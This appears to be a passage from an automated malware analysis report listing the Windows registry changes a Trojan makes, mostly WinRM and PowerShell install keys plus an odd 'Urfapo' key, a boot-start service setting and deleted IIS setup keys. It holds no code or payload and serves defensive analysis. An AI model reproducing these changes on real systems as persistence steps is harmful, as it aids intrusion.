[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"

[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"

[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"

[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"

[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathInetsrv" = "%System%\inetsrv"
"PathIISHelp" = "%WinDir%\Help\iishelp"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"

[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "9/20/2015"
"ReleaseType" = "Software Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 3B 67 3B 3C 5E 59 5A 15 F5 E8 BC 9F 0F 5C 2A"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"

[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"

[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"UpgradeType" = "0"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"

[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\.psc1]
"Content Type" = "application/PowerShell"

[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"

[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"

[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20150920"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"

[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathIISSamples" = "C:\Inetpub\iissamples"

[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"

[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"

[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"

[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]

The process net.exe:2156 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E A5 0E 3D 34 D2 AA CA 2F CD E0 2C EF A3 9D 6D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process net.exe:2224 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C BC EA EA C3 14 51 D4 AC EB 1E 69 95 B3 CE D3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process net.exe:2416 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 5B 3B BE 03 57 23 FF 69 EB F3 BB EE 66 1F AD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process hostname.exe:1384 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 52 A1 8D 57 C9 75 E6 5A AC D0 4F 66 72 46 D0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process PSCustomSetupUtil.exe:620 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 54 75 06 9D 4B F8 1F FE FB 0D 45 C8 74 36 7F"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
